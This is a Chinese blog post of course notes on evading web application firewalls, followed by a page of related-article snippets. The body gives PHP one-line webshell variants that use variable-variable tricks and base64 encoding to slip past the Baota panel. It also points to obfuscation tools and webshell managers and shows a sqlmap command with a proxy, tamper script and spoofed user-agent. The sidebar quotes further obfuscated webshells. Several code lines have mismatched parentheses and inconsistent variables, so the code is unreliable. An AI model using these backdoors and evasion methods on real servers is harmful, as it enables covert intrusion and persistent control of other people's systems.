waf绕过总结之权限控制代码混淆及行为造轮子与sql注入绕过

最新推荐文章于 2023-05-01 21:38:58 发布
最新推荐文章于 2023-05-01 21:38:58 发布
阅读量528 收藏
点赞数
分类专栏: 小迪安全学习日志 文章标签: servlet java 服务器 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61786761/article/details/126651611
版权

waf绕过总结之权限控制代码混淆及行为造轮子
1.导图
权限控制
脚本:
  asp,php,jsp,aspx,py,war等
工具:
  菜刀,蚁剑,冰蝎
代码:
  加密混淆
  变量覆盖+参数传递
  异或生成
行为:
  指纹变异
  自写轮子
监测:
  常规安全脚本工具使用

2.木马(一句话)代码绕过:
会被识别:
  <?php assert($_post['chopper']; ?>  
更改为:
  <?php
     $a=$_GET['x'];           #变量a=b
     $$b=$_GET['y'];        #传入assert
     $b($_POST['z'];         #组合成马
   ?>
  使用:?x=b&y=assert   +  post: z=phpinfo();

访问时发现宝塔拦截了phpinfo(),更改为:
  <?php
    $a=$_GET['x'];
    $$b=$_GET['y'];
    $b=(base64_decode($_POST['z']);    #通过编码来绕过监测,将z=phpinfo();用base64编码后再提交。
   ?>

3.一句话木马加密混淆
  网上下载加密项目:enphp-master
  接口加密:https://www.phpjiami.com/phpjiami.html
  
  补充:为什么加密后计算机可以识别:
         因为混淆加密后里面自己写函数然后还原。还有一种拓展加密,也就是要利用PHP拓展程序,但是免拓展的可以直接运行,因为里面自解析了。
  生产各种语言免杀的项目:GitHub上的webshell-venom-master
         介绍:采用魔术方法,随机命名,加密,反序列化

4.工具特点
蚁剑:更新状态,有插件,拓展性强,单向加密传输
冰蝎:更新状态,未知插件,双向加密
哥斯拉:新出

waf绕过-漏洞利用之注入上传站点等绕过
1.漏洞利用:
  sql注入
  文件上传
  xss跨站
  文件包含
  rce执行
2.sql注入绕过
  用代理过cc防护,用自定义规则绕过注入代码的防护,用自定义user-agent头绕过检测防护
sqlmap -u 'https://' --proxy="代理" --tamper=rdog.py --user-agent="mozilla15.0....."
  解释:--tamper=rdog.py 注入语句payload的替换绕过
           --random-agent 会随机产生user-agent头

ee .
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
绕过WAF运行命令执行漏洞的方法大全
hackzkaq的博客
10-09 2130
文章目录**前言****一、windows下**二、进入linux三、一个有趣的例子总结 前言 作者:掌控安全-桐镜 今天发散一下思维,聊聊关于命令执行漏洞绕过过滤的方法,让我们一起由浅入深。 一、windows下 1.1 符号与命令的关系 在看一个例子开始之前,首先了解一点,”和^这还有成对的圆括号()符号并不会影响命令的执行。在windows环境下,命令可以不区分大小写 whoami //正常执行 w"h"o"a"m"i //正常执行 w"h"o"a"m"i" //正常执行 wh"“oami //正常执
enphp-master.zip
09-12
enphp-master开源加密混淆 PHP 代码项目
sql注入
qq_27818157的博客
03-31 99
![]https://img-blog.csdnimg.cn/e3dd5020146344388030c341f2df9229.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Ieq6L2s55qE6L2u5a2Q,size_20,color_FFFFFF,t_70,g_se,x_16)
03-WAF绕过-漏洞利用之注入上传跨站等绕过
最新发布
qq_56414082的博客
05-01 716
通过sqlmap对网站进行测试的时候,如果对方有cc流量防护,需要给sqlmap设置一个代理进行注入。修改user-agent头:​ (1)加参数:–random-agent​ (2)直接加上头部加参数:–user-agent=“Mozilla/5.0 (compatible;指定一个user-agent的值进行测试。(3)修改配置文件sqlmap.conf中的agent变量值​ 加代理:–proxy=“http:tps123.kdlapi.com:15818”这里的代理为自己购买的。
一句话木马WAF绕过
CheAyuki13的博客
10-03 455
原理WAF通常会以关键字判断是否为一句话木马,所以要将一句话木马变形使用,从而绕过 waf:1.php变量函数<?php $a = "assert"; $a($_POST['-7']); ?>2.str_replace函数<?php $a = str_replace("b", "", "absbsbebrbt")...
【文件上传漏洞5】waf绕过
qq_41889600的博客
11-16 330
小迪安全 waf绕过
SQL注入之获取数据库用户表数据
qq_59099375的博客
03-18 1280
SQL注入获取数据库数据
网络安全笔记 -- 文件上传2(内容逻辑数组绕过、中间件漏洞绕过WAF绕过
swy66的博客
08-20 996
文件上传漏洞,中间件解析漏洞
SQL注入详解(上)
weixin_59571952的博客
11-29 4756
一:SQL注入漏洞介绍 SQL注入攻击包括通过输入数据从客户端插入或注入SQL查询到应用程序,一个成功的SQL注入攻击可以从数据库中获取敏感数据,修改数据库数据,执行数据库管理操作,在某些情况下能对操作系统发布命令,SQL注入攻击是一种注入攻击,它将SQL命令注入到数据层输入,从而影响执行预定义的SQL命令,由于用户的输入,也是SQL语句的一部分,所以攻击者可以利用这部分可以控制的内容,注入自己定义的语句,改变SQL语句执行逻辑,让数据库执行任意自己需要的指令 二:修复建议 1:所...
Waf攻防-信息收集&漏洞发现&漏洞利用&权限控制
m0_65336233的博客
11-09 1408
简单的介绍了信息收集、漏洞发现、漏洞利用和权限控制等waf绕过
SHELLPUB完整检测冰蝎4.0
chennqqi的专栏
07-25 1171
2022-07-25 T08:36 GMT+8 rebeyond在GitHub上更新了冰蝎4.0。新增多个特性,包括无文件内存马,经验证,SHELLPUB可完整检测冰蝎4.0。关于“冰蝎”"冰蝎"是最为流行WebShell管理工具之一,第一代WebShell管理工具"菜刀"的流量特征比较明显,很容易就被检测。冰蝎的流量是加密的,能够有效规避流量设备的检测;"冰蝎"客户端用...
enphp:一个开源加密PHP代码项目
03-23
恩PHP // 一个开源加密混淆 PHP 代码项目 // a Open Source PHP Code Confusion + Encryption Project 项目地址 GITHUB: : 友情提示: ://gitee.com/mz/enphp_opensource 背景 曾经,作者也是商业软件开发者中小将一名,软件总是被人破解,于是花了几个月研究了 EnPHP。 这套项目也有偿提供过给很多人,不过,应该网上存在不少破解了。 项目主要贵在为大家提供一个加密混淆和还原的思路。 // 严禁用于非法用途。 加密效果 使用方法 include './func_v2.php'; $options = array( //混淆方法名 1=字母混淆 2=乱码混淆 'ob_function' => 2, //混淆函数产生变量最大长
Mosquitto-PHP-master.zip
08-13
Mosquitto-php 是一款php环境下,物联网MQTT协议支持扩展库,包括服务端和客户端,使用起来非常上手,外国镜像不太好下载,我试了好几种方法下载了,传到这里,方便大家下载
最全的文件上传漏洞之WAF拦截绕过总结
mingyqf的博客
03-23 3230
https://cloud.tencent.com/developer/article/1944142
动手轮子:实现一个简单的依赖注入(一)
深蓝旭的博客
05-15 106
动手轮子:实现一个简单的依赖注入(一) Intro 在上一篇文章中主要介绍了一下要做的依赖注入的整体设计和大概编程体验,这篇文章要开始写代码了,开始实现自己的依赖注入框架。 类图 首先来温习一下上次提到的 UML 类图 服务生命周期 服务生命周期定义: public enum ServiceLifetime : sbyte { /// <summary> /// Specifies that a single instance of the service will...
WAF绕过SQL注入
向阳-Y.的博客
11-09 4351
WAF绕过SQL注入 对数据进行:大小写、加解密、编码解码等操作,使拦截失效 例如,以sqlilabs-less-2为例(假设安全狗已经设置了禁止查询数据库): 此时输入以下语句时,注入将会被拦截 id=-1 union select 1,database(),3# 首先我们大致分析一下为什么会被拦截? 安全狗拦截方式里采用了类似于正则表达式的编程,匹配到database()这个数据时,自动过滤。所以我们绕过只需要改变database()就行了: 下列语句中混插了“/**/”这样,安全狗就无法匹配到d
一句话木马,小马,大马,混淆一句话木马
Jim的博客
08-30 8249
php                 @$_='s'.'s'./*-/*-*/'e'./*-/*-*/'r';                   @$_=/*-/*-*/'a'./*-/*-*/$_./*-/*-*/'t';                   @$_/*-/*-*/($/*-/*-*/{'_P'./*-/*-*/'OS'./*-/*-*/'T'}               
第48天-WAF 绕过-权限控制之代码混淆行为轮子
MCTSOG的博客
04-11 977
思维导图 Safedog 代码层手写及脚本绕过 变量覆盖,加密混淆,异或生成 BT Aliyun 代码层手写及脚本绕过 编码解码(变量覆盖,加密混淆,异或生成) ASP,PHP,ASPX,JSP,PY 等后门免杀同理 一句话后门的原理: <?php@eval($_POST['password']) ?> @再php中含义为后面如果执行错误不会报错 eval()函数表示括号里的语句全做代码执行 $_POST[‘password’]`表示从页面中以post方式获取变量password的值。
突破WafBypass思维:SQL注入策略与云WAF分析
这篇“我的WafBypass之路”提供了关于WAF防护机制、工作原理以及SQL注入绕过策略的实用知识,对于网络安全专业人士和研究人员来说具有很高的参考价值。通过学习和实践,读者可以提升在对抗WAF时的应对能力,同时增强...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ee .

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值